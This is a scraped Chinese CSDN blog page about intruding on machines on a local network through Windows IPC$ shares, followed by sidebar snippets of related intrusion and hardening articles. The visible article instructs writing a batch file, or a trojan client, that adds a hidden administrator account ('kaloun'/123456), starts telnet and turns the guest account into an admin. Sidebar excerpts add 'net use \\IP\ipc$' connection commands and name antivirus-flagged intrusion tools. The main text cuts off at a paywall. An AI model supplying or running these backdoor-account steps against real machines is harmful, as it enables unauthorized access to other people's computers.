局域网IPC入侵心得

最新推荐文章于 2022-10-12 22:00:17 发布
最新推荐文章于 2022-10-12 22:00:17 发布
阅读量1.8k 收藏 10
点赞数
分类专栏: 黑客
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kaloun/article/details/8549997
版权
本文详细介绍了局域网IPC入侵的过程,包括获取目标IP、编写bat脚本、使用命令行工具进行连接和控制。内容涵盖命令如net user、net localgroup、net start等,以及如何利用ipc$建立连接、激活telnet服务。此外,还分享了常见的问题与解答,如建立IPC$连接的条件、文件拷贝失败的原因等。
摘要由CSDN通过智能技术生成

一、入侵实例 

1、获取目标的IP。这个不用说,既然要接入别人的电脑,首先当然得知道对方的IP 了。

 

2、打开记事本,键入命令,编写好命令后,把该文件另存为“kaloun.bat”(当然这里也可以制作成为程序或者直接木马客户端也行。制作时,每一条命令一行,不需要标点符号)。其中命令可选择有以下,辅助入侵:

    net user kaloun 123456 /add

    net localgroup administrators kaloun /add

    net start telnet  激活电脑telnet服务,电脑默认是不会打开的

    net user abcd /del,将用户名为abcd的用户删除

    net user guest /active:no,将用户名为guest的用户禁用

    net user guest /active:yes,激活用户名为guest的用户,部分电脑只允许简单文件共享,所以最好把guest帐户激活,并改为管理员帐户

    net user abcd,查看用户名为abcd的用户的情况

 

3、打开本地“命令提示符”对其进行如下命令操作:

最低0.47元/天 解锁文章
云颠
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一份详尽的IPC$入侵资料
Another's story
07-24 4418
  一 唠叨一下:网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).因此我写了这篇相当于解惑的教程.想把一些容易混淆
ipc$攻击
weixin_45647970的博客
06-27 2613
ipc$攻击使用条件: 1.开放了139、445端口 2.目标开启ipc$共享 3.获取用户账号密码 向默认共享复制失败原因: 1.对方没开启默认共享,能建立ipc连接的主机不一定开启了默认共享,因而在建立完连接之后马上向c连接的主机不一定开启了默认共享,因而在建立完连接之后马上向c连接的主机不一定开启了默认共享,因而在建立完连接之后马上向c,d,admin,admin,admin之类的默认共享复制文件,一旦对方未开启默认共享,将导致复制失败。ipc连接成功只能说明对方打开了ipc连接成功只能说明对方打开了
渗透之——内网IPC$入侵
冰河的专栏
01-07 2569
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85995503 一、域操作相关的命令 1.查看域用户 net user/domain 2.查看有几个域 net view/domain 3.查看域内的主机 net view/domain: XXX 4.查看域里面的组 net group/domain 5...
IPC入侵全攻略
01-21 3504
IPC入侵全攻略 by analysist http://www.china4lert.org 声明:其实针对IPC漏洞入侵的方法目前已经有很多的教程,但是其中很多教程并不完整,所以还是有很多网友来信问我关于IPC漏洞入侵的有关问题,这就是我写这篇文章的原因了。如果你觉得本文也不完整,那只好去找更好的版本了,但是我希望你能把你的意见和建议告诉我,让我不断的完善这篇文章。本文参考了小榕的流光2000
入侵检测——ipc
LainWith的博客
08-27 1242
目录什么是IPC复现抓包小写ipc特征大写IPC特征响应特征综合规则: 规则不是非常严谨,没有经过实战检验,检测方式仅供参考 什么是IPC IPC,又称ipc$,是windows系统中默认开启的一个共享空连接,用来让远程用户连接测试连接时的账号密码是否正确 在终端中输入net use \\目标IP\ipc$ 密码 /user:用户即可尝试连接目标 ipc$的利用条件: 管理员开启了默认共享 知道受害者的IP和登录密码 开启了139、445端口 常用命令: 工作组:net use \\目标IP\ipc
局域网共享 和 IPC$ 入侵问题
FISH 的专栏
11-24 3296
禁止ipc$默认共享的方法 以下四种方法可以参考一下: A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。 1,先把已有的删除 net share ipc$ /del net share admin$ /del net share c$ /del …………(有几个删几个) 2,禁止建立空连接  首先运行regedit,找到如下主键[HKEY_LOCAL_MACHIN
局域网入侵
05-22
通过软件 轻松进入局域网内的电脑~!还在想你的室友在干什么吗~ 去看看把~!
IPC$连接 入侵
07-19
IPC cmd 相关命令 物超所值 值得下载
无线局域网入侵检测
05-18
无线局域网(W LAN) 因其无线信道的特殊性, 较传统有线网更易受到攻击。入侵检测是较主动的安 全监控技术, 能防止外部的入侵还能检测内部的非法使用。研究将入侵检测应用于WLAN, 将会提高WLAN 的 主动防御能力。据...
局域网入侵完整版.doc
07-04
### 局域网入侵知识点详解 #### 一、局域网入侵概述 局域网(Local Area Network,LAN)是一种在有限地理区域内连接计算机和其他网络设备的技术。由于局域网通常用于学校、企业等内部环境,因此其安全性相对较高。...
IPC$局域网入侵详解
02-19 398
什么是ipc$   IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。  利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然对方机器必须开了ipc$共享,否则你是连接不上的)...
ipc$***实验(挺老的了,玩玩而已)
weixin_34090643的博客
07-15 224
搭建实验环境,这里用的VMware7虚拟机,客户机系统是win xp的英文版sp3的, 主机系统是windowsxp sp3: 摘抄一段概念: IPC是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。利用IPC我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们还可以得到目标主机上...
关于局域网IPC入侵XP方法
hzj114的专栏
01-20 1593
1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。 入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止
某后门病毒分析报告(2)——IPC$内网渗透
weixin_43742894的博客
04-13 392
接上篇后门病毒分析报告。 第一个线程中,使用 ipc$ 进行局域网内中的主机进行干扰,下面对 IPC$ 进行一定的了解。 IPC$ 基本概念 **IPC$ (Internet Process Connection)**是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 利用IPC$,连接者甚至可以...
内网渗透-IPC$横向控制OA系统【网络安全】
最新发布
kali_Ma的博客
10-12 1750
IPC(Internet ProcessConnection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。内网渗透-IPC$横向控制OA系统首先,需要建立一个ipc$
IPC$入侵综述
Yuan Lei 's Blog
01-24 2451
IPC$入侵综述 什么是ipcIPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)
(实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制
F4ckM3的专栏
08-18 3888
实验简介 实验所属系列:网络攻击与对抗实验对象:本科/专科信息安全专业相关课程及专业:信息网络安全概论、计算机网络实验时数(学分):2学时实验类别:实践实验类 实验目的   1.了解IPC$漏洞原理;   2.掌握IPC$漏洞攻击方法;   3.掌握psExec工具的使用;   4.掌握远程控制工具radmin的使用。 预备知识 本实验要求实验者具备如下的相关知识。     
IPC$入侵攻略
河北正定欢迎您-少占鱼
10-23 1134
一份详尽的IPC$入侵资料利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认
利用Sniffer进行局域网入侵检测与安全预警
"本文主要介绍了局域网入侵检测,特别是对SNIFFER这一工具的详尽解析,包括其软件和硬件版本,以及如何部署和利用它来检测网络状态、分析性能、发现安全威胁。此外,还提到了单播、组播和广播的数据包类型及其在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值